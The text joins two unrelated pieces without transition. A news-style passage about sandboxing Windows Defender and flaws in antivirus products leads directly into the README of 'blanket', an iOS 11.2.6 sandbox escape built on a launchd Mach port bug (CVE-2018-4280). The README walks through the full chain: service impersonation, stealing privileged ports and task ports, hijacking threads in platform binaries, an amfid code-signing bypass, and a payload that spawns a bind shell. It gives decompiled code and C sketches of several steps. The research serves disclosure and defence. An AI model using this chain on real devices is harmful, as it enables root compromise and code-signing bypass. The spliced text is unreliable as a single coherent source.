Forcing an antivirus product to work from an isolated context is no easy task: the application needs to check a large number of inputs in real time, so access to those resources is an absolute requirement, and an impact on performance is a likely side effect.

«It was a complex undertaking: we had to carefully study the implications of such an enhancement on performance and functionality. More importantly, we had to identify high-risk areas and make sure that sandboxing did not adversely affect the level of security we have been providing,» the official announcement reads.

Despite the complexity of the task, Microsoft was not the first to sandbox Windows Defender. Last year, experts from security outfit Trail of Bits, who also specialize in virtualization, created a framework that could run Windows applications in their own containers. Windows Defender was one of the applications that Trail of Bits successfully containerized, and the framework was released as open source.

AVs are as susceptible to flaws as other software

Despite their role in protecting the operating system, security products are susceptible to flaws just like other complex software. Windows Defender is definitely not the only one that is vulnerable.

In 2008, security researcher Feng Xue talked at BlackHat Europe about techniques for finding and exploiting vulnerabilities in antivirus software, referencing bugs as old as 2004.

Xue pointed out that flaws in this type of software stem from the fact that it has to deal with hundreds of file types that need to be checked with components called content parsers. A bug in just one parser could represent a potential path into the protected system.

Six years later, another researcher, Joxean Koret, took the matter further and showed just how vulnerable the defenders of computer systems are, letting the world know that exploiting them «is not different to exploiting other client-side applications.»

His analysis of 14 antivirus solutions on the market at the time revealed dozens of vulnerabilities that could be exploited remotely and locally, including denial of service, privilege escalation, and arbitrary code execution. His list included big names like Bitdefender and Kaspersky.

Antivirus developers do not leave their customers high and dry; they audit their products constantly, patching any bugs discovered during code review and improving their quality assurance processes to comb more finely for potential flaws.

Blanket is a sandbox escape targeting iOS 11.2.6

blanket

https://github.com/bazad/blanket

Blanket is a sandbox escape targeting iOS 11.2.6, although the main vulnerability was only patched in iOS 11.4.1. It exploits a Mach port replacement vulnerability in launchd (CVE-2018-4280), as well as several smaller vulnerabilities in other services, to execute code inside the ReportCrash process, which is unsandboxed, runs as root, and has the task_for_pid-allow entitlement. This grants blanket control over every process running on the phone, including security-critical ones like amfid.

The exploit consists of several stages. This README will explain the main vulnerability and the stages of the sandbox escape step-by-step.

Impersonating system services

While researching crash reporting on iOS, I discovered a Mach port replacement vulnerability in launchd. By crashing in a particular way, a process can make the kernel send a Mach message to launchd that causes launchd to over-deallocate a send right to a Mach port in its IPC namespace. This allows an attacker to impersonate any launchd service it can look up to the rest of the system, which opens up numerous avenues to privilege escalation.

This vulnerability is also present on macOS, but triggering the vulnerability on iOS is more difficult due to checks in launchd that ensure that the Mach exception message comes from the kernel.

CVE-2018-4280: launchd Mach port over-deallocation while handling EXC_CRASH exception messages

Launchd multiplexes multiple different Mach message handlers over its main port, including a MIG handler for exception messages. If a process sends a mach_exception_raise or mach_exception_raise_state_identity message to its own bootstrap port, launchd will receive and process that message as a host-level exception.

Unfortunately, launchd’s handling of these messages is buggy. If the exception type is EXC_CRASH, then launchd will deallocate the thread and task ports sent in the message and then return KERN_FAILURE from the service routine, causing the MIG system to deallocate the thread and task ports again. (The assumption is that if a service routine returns success, then it has taken ownership of all resources in the Mach message, while if the service routine returns an error, then it has taken ownership of none of the resources.)

Here is the code from launchd’s service routine for mach_exception_raise messages, decompiled using IDA/Hex-Rays and lightly edited for readability:

kern_return_t __fastcall
catch_mach_exception_raise(                             // (a) The service routine is
        mach_port_t            exception_port,          //     called with values directly
        mach_port_t            thread,                  //     from the Mach message
        mach_port_t            task,                    //     sent by the client. The
        exception_type_t       exception,               //     thread and task ports could
        mach_exception_data_t  code,                    //     be arbitrary send rights.
        mach_msg_type_number_t codeCnt)
{
    __int64 __stack_guard;                 // ST28_8@1
    kern_return_t kr;                      // w0@1 MAPDST
    kern_return_t result;                  // w0@4
    __int64 codes_left;                    // x25@6
    mach_exception_data_type_t code_value; // t1@7
    int pid;                               // [xsp+34h] [xbp-44Ch]@1
    char codes_str[1024];                  // [xsp+38h] [xbp-448h]@7

    __stack_guard = *__stack_chk_guard_ptr;
    pid = -1;
    kr = pid_for_task(task, &pid);
    if ( kr )
    {
        _os_assumes_log(kr);
        _os_avoid_tail_call();
    }
    if ( current_audit_token.val[5] )                   // (b) If the message was sent by
    {                                                   //     a process with a nonzero PID
        result = KERN_FAILURE;                          //     (any non-kernel process),
    }                                                   //     the message is rejected.
    else
    {
        if ( codeCnt )
        {
            codes_left = codeCnt;
            do
            {
                code_value = *code;
                ++code;
                __snprintf_chk(codes_str, 0x400uLL, 0, 0x400uLL, "0x%llx", code_value);
                --codes_left;
            }
            while ( codes_left );
        }
        launchd_log_2(
            0LL,
            3LL,
            "Host-level exception raised: pid = %d, thread = 0x%x, "
                "exception type = 0x%x, codes = { %s }",
            pid,
            thread,
            exception,
            codes_str);
        kr = deallocate_port(thread);                   // (c) The "thread" port sent in
        if ( kr )                                       //     the message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        kr = deallocate_port(task);                     // (d) The "task" port sent in the
        if ( kr )                                       //     message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        if ( exception == EXC_CRASH )                   // (e) If the exception type is
            result = KERN_FAILURE;                      //     EXC_CRASH, then KERN_FAILURE
        else                                            //     is returned. MIG will
            result = 0;                                 //     deallocate the ports again.
    }
    *__stack_chk_guard_ptr;
    return result;
}

This is what the code does:

  1. This function is the Mach service routine for mach_exception_raise exception messages: it gets invoked directly by the Mach system when launchd processes a mach_exception_raise Mach exception message. The arguments to the service routine are parsed from the Mach message, and hence are controlled by the message’s sender.
  2. At (b), launchd checks that the Mach exception message was sent by the kernel. The sender’s audit token contains the PID of the sending process in field 5, which will only be zero for the kernel. If the message wasn’t sent by the kernel, it is rejected.
  3. The thread and task ports from the message are explicitly deallocated at (c) and (d).
  4. At (e), launchd checks whether the exception type is EXC_CRASH, and returns KERN_FAILURE if so. The intent is to make sure not to handle EXC_CRASH messages, presumably so that ReportCrash is invoked as the corpse handler. However, returning KERN_FAILURE at this point will cause the task and thread ports to be deallocated again when the exception message is cleaned up later. This means those two ports will be over-deallocated.

In order for this vulnerability to be useful, we will want to free launchd’s send right to a Mach service it vends, so that we can then impersonate that service to the rest of the system. This means that we’ll need the task and thread ports in the exception message to really be send rights to the Mach service port we want to free in launchd. Then, once we’ve sent launchd the malicious exception message and freed the service port, we will try to get that same port name reused, but this time for a Mach port to which we hold the receive right. That way, when a client asks launchd to give them a send right to the Mach port for the service, launchd will instead give them a send right to our port, letting us impersonate that service to the client. After that, there are many different routes to gain system privileges.

Triggering the vulnerability

In order to actually trigger the vulnerability, we’ll need to bypass the check that the message was sent by the kernel. This is because if we send the exception message to launchd directly it will just be discarded. Somehow, we need to get the kernel to send a «malicious» exception message containing a Mach send right for a system service instead of the real thread and task ports.

As it turns out, there is a Mach trap, task_set_special_port, that can be used to set a custom send right to be used in place of the true task port in certain situations. One of these situations is when the kernel generates an exception message on behalf of a task: instead of placing the true task send right in the exception message, the kernel will use the send right supplied by task_set_special_port. More specifically, if a task calls task_set_special_port to set a custom value for its TASK_KERNEL_PORT special port and then the task crashes, the exception message generated by the kernel will have a send right to the custom port, not the true task port, in the «task» field. An equivalent API, thread_set_special_port, can be used to set a custom port in the «thread» field of the generated exception message.

Because of this behavior, it’s actually not difficult at all to make the kernel generate a «malicious» exception message containing a Mach service port in place of the task and thread port. However, we still need to ensure that the exception message that we generate gets delivered to launchd.

Once again, making sure the kernel delivers the «malicious» exception message to launchd isn’t difficult if you know the right API. The function thread_set_exception_ports will set any Mach send right as the port to which exception messages on this thread are delivered. Thus, all we need to do is invoke thread_set_exception_ports with the bootstrap port, and then any exception we generate will cause the kernel to send an exception message to launchd.

The last piece of the puzzle is getting the right exception type. The vulnerability will only be triggered for EXC_CRASH exceptions. A little trial and error reveals that we can easily generate EXC_CRASH exceptions by calling the standard abort function.

Thus, in summary, we can use existing and well-documented APIs to make the kernel generate a malicious EXC_CRASH exception message on our behalf and deliver it to launchd, triggering the vulnerability and freeing the Mach service port:

  1. Use thread_set_exception_ports to set launchd as the exception handler for this thread.
  2. Call bootstrap_look_up to get the service port for the service we want to impersonate from launchd.
  3. Call task_set_special_port/thread_set_special_port to use that service port instead of the true task and thread ports in exception messages.
  4. Call abort. The kernel will send an EXC_CRASH exception message to launchd, but the task and thread ports in the message will be the target service port.
  5. Launchd will process the exception message and free the service port.
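
A minimal sketch of these five steps (my own illustration based on the description above, not blanket’s actual code; error handling omitted, and target_service is the name of the service to free):

#include <mach/mach.h>
#include <servers/bootstrap.h>
#include <stdlib.h>

static void trigger_port_free(const char *target_service)
{
    mach_port_t service = MACH_PORT_NULL;
    /* 1. Deliver this thread's exception messages to launchd. */
    thread_set_exception_ports(mach_thread_self(), EXC_MASK_CRASH,
                               bootstrap_port,
                               EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES,
                               THREAD_STATE_NONE);
    /* 2. Get a send right to the service we want to impersonate. */
    bootstrap_look_up(bootstrap_port, target_service, &service);
    /* 3. Substitute the service port for the task and thread ports in
     *    kernel-generated exception messages. */
    task_set_special_port(mach_task_self(), TASK_KERNEL_PORT, service);
    thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, service);
    /* 4-5. Generate EXC_CRASH; launchd over-deallocates the service
     *      port while handling the resulting exception message. */
    abort();
}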

Running code after the crash

There’s a problem with the above strategy: calling abort will kill our process. If we want to be able to run any code at all after triggering the vulnerability, we need a way to perform the crash in another process.

(With other exception types a process could actually recover from the exception. The way a process would recover is to set its thread exception handler to be launchd and its task exception handler to be itself. After launchd processes and fails to handle the exception, the kernel would send the exception to the task handler, which would reset the thread state and inform the kernel that the exception has been handled. However, a process cannot catch its own EXC_CRASH exceptions, so we do need two processes.)

One strategy is to first exploit a vulnerability in another process on iOS and force that process to set its kernel ports and crash. However, for a proof-of-concept, it’s easier to create an app extension.

App extensions, introduced in iOS 8, provide a way to package some functionality of an application so it is available outside of the application. The code of an app extension runs in a separate, sandboxed process. This makes it very easy to launch a process that will set its special ports, register launchd as its exception handler for EXC_CRASH, and then call abort.

There is no supported way for an app to programmatically launch its own app extension and talk to it. However, Ian McDowell wrote a great article describing how to use the private NSExtension API to launch and communicate with an app extension process. I’ve used an almost identical strategy here. The only difference is that we need to communicate a Mach port to the app extension process, which involves registering a dummy service with launchd to which the app extension connects.

Preventing port reuse in launchd

One challenge you would notice if you ran the exploit as described is that occasionally you would not be able to reacquire the freed port. The reason for this is that the kernel tracks a process’s free IPC entries in a freelist, and so a just-freed port name will be reused (with a different generation number) when a new port is allocated in the IPC table. Thus, we will only reallocate the port name we want if launchd doesn’t reuse that IPC entry slot for another port first.

The way around this is to bury the free IPC entry slot down the freelist, so that if launchd allocates new ports those other slots will be used first. How do we do this? We can register a bunch of dummy Mach services in launchd with ports to which we hold the receive right. When we call abort, the exception handler will fire first, and then the process state, including the Mach ports, will be cleaned up. When launchd receives the EXC_CRASH exception it will inadvertently free the target service port, placing the IPC entry slot corresponding to that port name at the head of the freelist. Then, when the rest of our app extension’s Mach ports are destroyed, launchd will receive notifications and free the dummy service ports, burying the target IPC entry slot behind the slots for the just-freed ports. Thus, as long as launchd allocates fewer ports than the number of dummy services we registered, the target slot will still be on the freelist, meaning we can still cause launchd to reallocate the slot with the same port name as the original service.

The limitation of this strategy is that we need the com.apple.security.application-groups entitlement in order to register services with launchd. There are other ways to stash Mach ports in launchd, but using application groups is certainly the easiest, and suffices for this proof-of-concept.

Impersonating the freed service

Once we have spawned the crasher app extension and freed a Mach send right in launchd, we need to reallocate that Mach port name with a send right to which we hold the receive right. That way, any messages launchd sends to that port name will be received by us, and any time launchd shares that port name with a client, the client will receive a send right to our port. In particular, if we can free launchd’s send right to a Mach service, then any process that requests that service from launchd will receive a send right to our own port instead of the real service port. This allows us to impersonate the service or perform a man-in-the-middle attack, inspecting all messages that the client sends to the service.

Getting the freed port name reused so that it refers to a port we own is also quite simple, given that we’ve already decided to use the application-groups entitlement: just register dummy Mach services with launchd until one of them reuses the original port name. We’ll need to do it in batches, registering a large number of dummy services together, checking to see if any has successfully reused the freed port name, and then deregistering them. The reason is that we need to be sure that our registrations go all the way back in the IPC port freelist to recover the buried port name we want.

We can check whether we’ve managed to successfully reuse the freed port name by looking up the original service with bootstrap_look_up: if it returns one of our registered service ports, we’re done.
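
Because Mach coalesces a send right to a port whose receive right we already hold under the same port name, the check is a simple comparison. A sketch, assuming fake_service_ports[] holds the receive rights for our registered dummy services:

#include <mach/mach.h>
#include <servers/bootstrap.h>
#include <stdbool.h>
#include <stddef.h>

static bool reused_freed_name(const char *original_service,
                              const mach_port_t *fake_service_ports,
                              size_t count)
{
    mach_port_t sp = MACH_PORT_NULL;
    bootstrap_look_up(bootstrap_port, original_service, &sp);
    /* If launchd handed out a send right to one of our own ports, it
     * shows up under the same name as our receive right. */
    for (size_t i = 0; i < count; i++)
        if (sp == fake_service_ports[i])
            return true;
    return false;
}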

Once we’ve managed to register a new service that gets the same port name as the original, any clients that look up the original service in launchd will be given a send right to our port, not the real service port. Thus, we are effectively impersonating the original service to the rest of the system (or at least, to those processes that look up the service after our attack).

Stage 1: Obtaining the host-priv port

Once we have the capability to impersonate arbitrary system services, the next step is to obtain the host-priv port. This step is straightforward, and is not affected by the changes in iOS 11.3. The high-level idea of this attack is to impersonate SafetyNet, crash ReportCrash, and then retrieve the host-priv port from the dying ReportCrash task port sent in the exception message.

About ReportCrash and SafetyNet

ReportCrash is responsible for generating crash reports on iOS. This one binary actually vends 4 different services (each in a different process, although not all may be running at any given time):

  1. com.apple.ReportCrash is responsible for generating crash reports for crashing processes. It is the host-level exception handler for EXC_CRASH, EXC_GUARD, and EXC_RESOURCE exceptions.
  2. com.apple.ReportCrash.Jetsam handles Jetsam reports.
  3. com.apple.ReportCrash.SimulateCrash creates reports for simulated crashes.
  4. com.apple.ReportCrash.SafetyNet is the registered exception handler for the com.apple.ReportCrash service.

The ones of interest to us are com.apple.ReportCrash and com.apple.ReportCrash.SafetyNet, hereafter referred to simply as ReportCrash and SafetyNet. Both of these are MIG-based services, and they run effectively the same code.

When ReportCrash starts up, it looks up the SafetyNet service in launchd and sets the returned port as the task-level exception handler. The intent seems to be that if ReportCrash itself were to crash, a separate process would generate the crash report for it. However, this code path looks defunct: ReportCrash registers SafetyNet for mach_exception_raise messages, even though both ReportCrash and SafetyNet only handle mach_exception_raise_state_identity messages. Nonetheless, both services are still present and reachable from within the iOS container sandbox.

ReportCrash manipulation primitives

In order to carry out the following attack, we need to be able to manipulate ReportCrash (or SafetyNet) to behave in the way we want. Specifically, we need the following capabilities: start ReportCrash on demand, force ReportCrash to exit, crash ReportCrash, and make sure that ReportCrash doesn’t exit while we’re using it. Here I’ll describe how we achieve each objective.

In order to start ReportCrash, we simply need to send it a Mach message: launchd will start it on demand. However, due to its peculiar design, any message type except mach_exception_raise_state_identity will cause ReportCrash to stop responding to new messages and eventually exit. Thus, we need to send a mach_exception_raise_state_identity message if we want it to stay alive afterwards.

In order to exit ReportCrash, we can simply send it any other type of Mach message.

There are many ways to crash ReportCrash. The easiest is probably to send a mach_exception_raise_state_identity message with the thread port set to MACH_PORT_NULL.

Finally, we need to ensure that ReportCrash does not exit while we’re using it. Each mach_exception_raise_state_identity message that it processes causes it to spin off another thread to listen for the next message while the original thread generates the crash report. ReportCrash will exit once all of the outstanding threads generating a crash report have finished. Thus, if we can stall one of those threads while it is in the process of generating a crash report, we can keep it from ever exiting.

The easiest way I found to do that was to send a mach_exception_raise_state_identity message with a custom port in the task and thread fields. Once ReportCrash tries to generate a crash report, it will call task_policy_get on the «task» port, which will cause it to send a Mach message to the port that we sent and await a reply. But since the «task» port is just a regular old Mach port, we can simply not reply to the Mach message, and ReportCrash will wait indefinitely for task_policy_get to return.

Extracting host-priv from ReportCrash

For the first stage of the exploit, the attack plan is relatively straightforward:

  1. Start the SafetyNet service and force it to stay alive for the duration of our attack.
  2. Use the launchd service impersonation primitive to impersonate SafetyNet. This gives us a new port on which we can receive messages intended for the real SafetyNet service.
  3. Make any existing instance of ReportCrash exit. That way, we can ensure that ReportCrash looks up our SafetyNet port in the next step.
  4. Start ReportCrash. ReportCrash will look up SafetyNet in launchd and set the resulting port, which is the fake SafetyNet port for which we own the receive right, as the destination for EXC_CRASH messages.
  5. Trigger a crash in ReportCrash. After seeing that there are no registered handlers for the original exception type, ReportCrash will enter the process death phase. At this point XNU will see that ReportCrash registered the fake SafetyNet port to receive EXC_CRASH exceptions, so it will generate an exception message and send it to that port.
  6. We then listen on the fake SafetyNet port for the EXC_CRASH message. It will be of type mach_exception_raise, which means it will contain ReportCrash’s task port.
  7. Finally, we use task_get_special_port on the ReportCrash task port to get ReportCrash’s host port, as sketched below. Since ReportCrash is unsandboxed and runs as root, this is the host-priv port.
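
Step 7 boils down to a single call. A sketch, where reportcrash_task is the task port received in the exception message:

#include <mach/mach.h>

static mach_port_t extract_host_priv(task_t reportcrash_task)
{
    mach_port_t host_priv = MACH_PORT_NULL;
    /* ReportCrash is unsandboxed and runs as root, so its host port
     * is the host-priv port. */
    task_get_special_port(reportcrash_task, TASK_HOST_PORT, &host_priv);
    return host_priv;
}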

At the end of this stage of the sandbox escape, we end up with a usable host-priv port. This alone demonstrates that this is a serious security issue.

Stage 2: Escaping the sandbox

Even though we have the host-priv port, our goal is to fully escape the sandbox and run code as root with the task_for_pid-allow entitlement. The first step in achieving that is to simply escape the sandbox.

Technically speaking, there’s no reason we need to obtain the host-priv port before escaping the sandbox: these two steps are independent and can occur in either order. However, this stage will leave the system unstable if it or a subsequent stage fails, so it’s worth doing it later.

The high-level attack is to use the same launchd vulnerability again to impersonate a system service. However, this time our goal is to impersonate a service to which a client will send its task port in a Mach message. It’s easy to find by experimentation on iOS 11.2.6 that if we impersonate com.apple.CARenderServer (hereafter CARenderServer) hosted by backboardd and then communicate with com.apple.DragUI.druid.source, the unsandboxed druid daemon will send its task port in a Mach message to the fake service port.

This step of the exploit is broken on iOS 11.3 because druid no longer sends its task port in the Mach message to CARenderServer. Despite this, I’m confident that this vulnerability can still be used to escape the sandbox. One way to go about this is to look for unsandboxed services that trust input from other services. These types of «vulnerabilities» would never be exploitable without the capability to replace system services, which means they are probably a low-priority attack surface, both internally and externally to Apple.

Crashing druid

Just like with ReportCrash, we need to be able to force druid to restart in case it is already running, so that it looks up our fake CARenderServer port in launchd. For this purpose, I decided to use a bug in libxpc that was already scheduled to be fixed.

While looking through libxpc, I found an out-of-bounds read that could be used to force any XPC service to crash:

void _xpc_dictionary_apply_wire_f
(
        OS_xpc_dictionary *xdict,
        OS_xpc_serializer *xserializer,
        const void *context,
        bool (*applier_fn)(const char *, OS_xpc_serializer *, const void *)
)
{
...
    uint64_t count = (unsigned int)*serialized_dict_count;
    if ( count )
    {
        uint64_t depth = xserializer->depth;
        uint64_t index = 0;
        do
        {
            const char *key = _xpc_serializer_read(xserializer, 0, 0, 0);
            size_t keylen = strlen(key);
            _xpc_serializer_advance(xserializer, keylen + 1);
            if ( !applier_fn(key, xserializer, context) )
                break;
            xserializer->depth = depth;
            ++index;
        }
        while ( index < count );
    }
...
}

The problem is that the use of an unchecked strlen on attacker-controlled data allows the key for the serialized dictionary entry to extend beyond the end of the data buffer. This means the XPC service deserializing the dictionary will crash, either when strlen dereferences out-of-bounds memory or when _xpc_serializer_advance tries to advance the serializer past the end of the supplied data.

This bug was already fixed in iOS 11.3 Beta by the time I discovered it, so I did not report it to Apple. The exploit is available as an independent project in my xpc-crash repository.

In order to use this bug to crash druid, we simply need to send the druid service a malformed XPC message such that the dictionary’s key is unterminated and extends to the last byte of the message.

Obtaining druid’s task port

Obtaining druid’s task port on iOS 11.2.6 using our service impersonation primitive is easy:

  1. Use the Mach service impersonation capability to impersonate CARenderServer.
  2. Send a message to the druid service so that it starts up.
  3. If we don’t get druid’s task port after a few seconds, kill druid using the XPC bug and restart it.
  4. Druid will send us its task port on the fake CARenderServer port.

Getting around the platform binary task port restrictions

Once we have druid’s task port, we still need to figure out how to execute code inside the druid process.

The problem is that XNU protects task ports for platform binaries from being modified by non-platform binaries. The defense is implemented in the function task_conversion_eval, which is called by convert_port_to_locked_task and convert_port_to_task_with_exec_token:

kern_return_t
task_conversion_eval(task_t caller, task_t victim)
{
	/*
	 * Tasks are allowed to resolve their own task ports, and the kernel is
	 * allowed to resolve anyone's task port.
	 */
	if (caller == kernel_task) {
		return KERN_SUCCESS;
	}

	if (caller == victim) {
		return KERN_SUCCESS;
	}

	/*
	 * Only the kernel can can resolve the kernel's task port. We've established
	 * by this point that the caller is not kernel_task.
	 */
	if (victim == kernel_task) {
		return KERN_INVALID_SECURITY;
	}

#if CONFIG_EMBEDDED
	/*
	 * On embedded platforms, only a platform binary can resolve the task port
	 * of another platform binary.
	 */
	if ((victim->t_flags & TF_PLATFORM) && !(caller->t_flags & TF_PLATFORM)) {
#if SECURE_KERNEL
		return KERN_INVALID_SECURITY;
#else
		if (cs_relax_platform_task_ports) {
			return KERN_SUCCESS;
		} else {
			return KERN_INVALID_SECURITY;
		}
#endif /* SECURE_KERNEL */
	}
#endif /* CONFIG_EMBEDDED */

	return KERN_SUCCESS;
}

MIG conversion routines that rely on these functions, including convert_port_to_task and convert_port_to_map, will thus fail when we call them on druid’s task. For example, mach_vm_write won’t allow us to manipulate druid’s memory.

However, while looking at the MIG file osfmk/mach/task.defs in XNU, I noticed something interesting:

/*
 *	Returns the set of threads belonging to the target task.
 */
routine task_threads(
		target_task	: task_inspect_t;
	out	act_list	: thread_act_array_t);

The function task_threads, which enumerates the threads in a task, actually takes a task_inspect_t rather than a task_t, which means MIG converts it using convert_port_to_task_inspect rather than convert_port_to_task. A quick look at convert_port_to_task_inspect reveals that this function does not perform the task_conversion_eval check, meaning we can call it successfully on platform binaries. This is interesting because the returned threads are not thread_inspect_t rights, but rather full thread_act_t rights. Put another way, task_threads promotes a non-modifiable task right into modifiable thread rights. And since there’s no equivalent thread_conversion_eval, this means we can use the Mach thread APIs to modify the threads in a task even if that task is a platform binary.
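
A sketch of this promotion (druid_task is the platform binary’s task port; error handling omitted):

#include <mach/mach.h>

static void hijack_first_thread(task_t druid_task)
{
    thread_act_array_t threads;
    mach_msg_type_number_t count;
    /* Succeeds even on a platform binary, because the task_inspect_t
     * conversion skips task_conversion_eval. */
    task_threads(druid_task, &threads, &count);
    /* The returned rights are full thread_act_t rights, so register
     * state can be read and rewritten directly. */
    arm_thread_state64_t state;
    mach_msg_type_number_t state_count = ARM_THREAD_STATE64_COUNT;
    thread_get_state(threads[0], ARM_THREAD_STATE64,
                     (thread_state_t)&state, &state_count);
    /* ... modify pc, sp, x0-x7 and call thread_set_state() ... */
}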

In order to take advantage of this, I wrote a library called threadexec which builds a full-featured function call capability on top of the Mach threads API. The threadexec project in and of itself was a significant undertaking, but as it is only indirectly relevant to this exploit, I will forego a detailed explanation of its inner workings.

Stage 3: Installing a new host-level exception handler

Once we have the host-priv port and unsandboxed code execution inside of druid, the next stage of the full sandbox escape is to install a new host-level exception handler. This process is straightforward given our current capabilities:

  1. Get the current host-level exception handler for EXC_BAD_ACCESS by calling host_get_exception_ports.
  2. Allocate a Mach port that will be the new host-level exception handler for EXC_BAD_ACCESS.
  3. Send the host-priv port and a send right to the Mach port we just allocated over to druid.
  4. Using our execution context in druid, make druid call host_set_exception_ports to register our Mach port as the host-level exception handler for EXC_BAD_ACCESS, as sketched below.
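
In terms of API, the call we make druid perform in step 4 looks roughly like the following sketch (host_priv and new_handler_port are the ports sent over in step 3; this is not the exploit’s literal code):

#include <mach/mach.h>

/* Executed in druid's context (via threadexec): register our port as
 * the host-level handler for EXC_BAD_ACCESS. */
static void install_host_handler(host_priv_t host_priv,
                                 mach_port_t new_handler_port)
{
    host_set_exception_ports(host_priv, EXC_MASK_BAD_ACCESS,
                             new_handler_port,
                             EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES,
                             THREAD_STATE_NONE);
}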

After this stage, any time a process accesses an invalid memory address (and also does not have a registered exception handler), an EXC_BAD_ACCESS exception message will be sent to our new exception handler port. This will give us the task port of any crashing process, and since EXC_BAD_ACCESS is a recoverable exception, this time we can use the task port to execute code.

Stage 4: Getting ReportCrash’s task port

The next stage is to trigger an EXC_BAD_ACCESS exception in ReportCrash so that its task port gets sent in an exception message to our new exception handler port:

  1. Crash ReportCrash using the previously described technique. This will cause ReportCrash to generate an EXC_BAD_ACCESS exception. Since ReportCrash has no exception handler registered for EXC_BAD_ACCESS (remember SafetyNet is registered for EXC_CRASH), the exception will be delivered to the host-level exception handler.
  2. Listen for exception messages on our host exception handler port.
  3. When we receive the exception message for ReportCrash, save the task and thread ports. Suspend the crashing thread and return KERN_SUCCESS to indicate to the kernel that the exception has been handled and ReportCrash can be resumed.
  4. Use the task and thread ports to establish an execution context inside ReportCrash just like we did with druid.

At this point, we have code execution inside an unsandboxed, root, task_for_pid-allow process.

Stage 5: Restoring the original host-level exception handler

The next two stages aren’t strictly necessary but should be performed anyway.

Once we have code execution inside ReportCrash, we should reset the host-level exception handler for EXC_BAD_ACCESS using druid:

  1. Send the old host-level exception handler port over to druid.
  2. Call host_set_exception_ports in druid to re-register the old host-level exception handler for EXC_BAD_ACCESS.

This will stop our exception handler port from receiving exception messages for other crashing processes.

Stage 6: Fixing up launchd

The last step is to restore the damage we did to launchd when we freed service ports in its IPC namespace in order to impersonate them:

  1. Call task_for_pid in ReportCrash to get launchd’s task port.
  2. For each service we impersonated:
    1. Get launchd’s name for the send right to the fake service port. This is the original name of the real service port.
    2. Destroy the fake service port, deregistering the fake service with launchd.
    3. Call mach_port_insert_right in ReportCrash to push the real service port into launchd’s IPC space under the original name, as sketched below.
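
Step 2.3 is a single Mach call made from ReportCrash. A sketch, with launchd_task, original_name, and real_service_port as obtained in the steps above:

#include <mach/mach.h>

static void restore_service_port(task_t launchd_task,
                                 mach_port_name_t original_name,
                                 mach_port_t real_service_port)
{
    /* Reinstall the real service port into launchd's IPC space under
     * the name it originally occupied. */
    mach_port_insert_right(launchd_task, original_name,
                           real_service_port, MACH_MSG_TYPE_COPY_SEND);
}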

After this step is done, the system should once again be fully functional. After successful exploitation, there should be no need to force reset the device, since the exploit repairs all the damage itself.

Post-exploitation

Blanket also packages a post-exploitation payload that bypasses amfid and spawns a bind shell. This section will describe how that is achieved.

Spawning a payload process

Even after gaining code execution in ReportCrash, using that capability is not easy: we are limited to performing individual function calls from within the process, which makes it painful to perform complex tasks. Ideally, we’d like a way to run code natively with ReportCrash’s privileges, either by injecting code into ReportCrash or by spawning a new process with the same (or higher) privileges.

Blanket chooses the process spawning route. We use task_for_pid and our platform binary status in ReportCrash to get launchd’s task port and create a new thread inside of launchd that we can control. We then use that thread to call posix_spawn to launch our payload binary. The payload binary can be signed with restricted entitlements, including task_for_pid-allow, to grant additional capabilities.

Bypassing amfid

In order for iOS to accept our newly spawned binary, we need to bypass codesigning. Various strategies have been discussed over the years, but the most common current strategy is to register an exception handler for amfid and then perform a data patch so that amfid crashes when trying to call MISValidateSignatureAndCopyInfo. This allows us to fake the implementation of that function to pretend that the code signature is valid.

However, there’s another approach which I believe is more robust and flexible: rather than patching amfid at all, we can simply register a new amfid port in the kernel.

The kernel keeps track of which port to send messages to amfid using a host special port called HOST_AMFID_PORT. If we have unsandboxed root code execution, we can set this port to a new value. Apple has protected against this attack by checking whether the reply to a validation request really came from amfid: the cdhash of the sender is compared to amfid’s cdhash. However, this doesn’t actually prevent the message from being sent to a process other than amfid; it only prevents the reply from coming from a non-amfid process. If we set up a triangle where the kernel sends messages to us, we generate the reply and pass it to amfid, and then amfid sends the reply to the kernel, then we’ll be able to bypass the sender check.
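
Re-registering the port is then one call from our unsandboxed root context. A sketch (our_amfid_port is a port we hold the receive right to; HOST_AMFID_PORT is the constant defined in XNU’s host_special_ports.h):

#include <mach/mach.h>

/* The kernel now sends validation requests to us; we craft replies and
 * relay them through the real amfid so that the kernel's cdhash check
 * on the reply still passes. */
static void interpose_amfid(host_priv_t host_priv, mach_port_t our_amfid_port)
{
    host_set_special_port(host_priv, HOST_AMFID_PORT, our_amfid_port);
}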

There are numerous advantages to this approach, of which the biggest is probably access to additional flags in the verify_code_directory service routine. Even though amfid does not use them all, there are many other output flags that amfid could set to control the behavior of codesigning. Here’s a partial prototype of verify_code_directory:

kern_return_t
verify_code_directory(
		mach_port_t    amfid_port,
		amfid_path_t   path,
		uint64_t       file_offset,
		int32_t        a4,
		int32_t        a5,
		int32_t        a6,
		int32_t *      entitlements_valid,
		int32_t *      signature_valid,
		int32_t *      unrestrict,
		int32_t *      signer_type,
		int32_t *      is_apple,
		int32_t *      is_developer_code,
		amfid_a13_t    a13,
		amfid_cdhash_t cdhash,
		audit_token_t  audit);

Of particular interest for jailbreak developers is the is_apple parameter. This parameter does not appear to be used by amfid, but if set, it will cause the kernel to set the CS_PLATFORM_BINARY codesigning flag, which grants the application platform binary privileges. In particular, this means that the application can now use task ports to modify platform binaries directly.

Loopholes used in this attack

This attack takes advantage of several loopholes that aren’t security vulnerabilities themselves but do minimize the effectiveness of various exploit mitigations. Not all of these need to be closed together, since some are partially redundant, but it’s worth listing them all anyway.

In the kernel:

  1. task_threads can promote an inspect-only task_inspect_t to a modify-capable thread_act_t.
  2. There is no thread_conversion_eval to perform the role of task_conversion_eval for threads.
  3. A non-platform binary may use a task_inspect_t right for a platform binary.
  4. Exception messages for unsandboxed processes may be delivered to sandboxed processes, even though that provides a way to escape the sandbox. It’s not clear whether there is a clean fix for this loophole.
  5. Unsandboxed code execution, the host-priv port, and the ability to crash a task_for_pid-allow process can be combined to build a task_for_pid workaround. (The workaround is: call host_set_exception_ports to set a new host-level exception handler, then crash the task_for_pid-allow process to receive its task port and execute code with the entitlement.)

In app extensions:

  1. App extensions that share an application group can communicate using Mach messages, despite the documentation suggesting that communication between the host app and the app extension should be impossible.

Recommended fixes and mitigations

I recommend the following fixes, roughly in order of importance:

  1. Only deallocate Mach ports in the launchd service routines when returning KERN_SUCCESS. This will fix the Mach port replacement vulnerability.
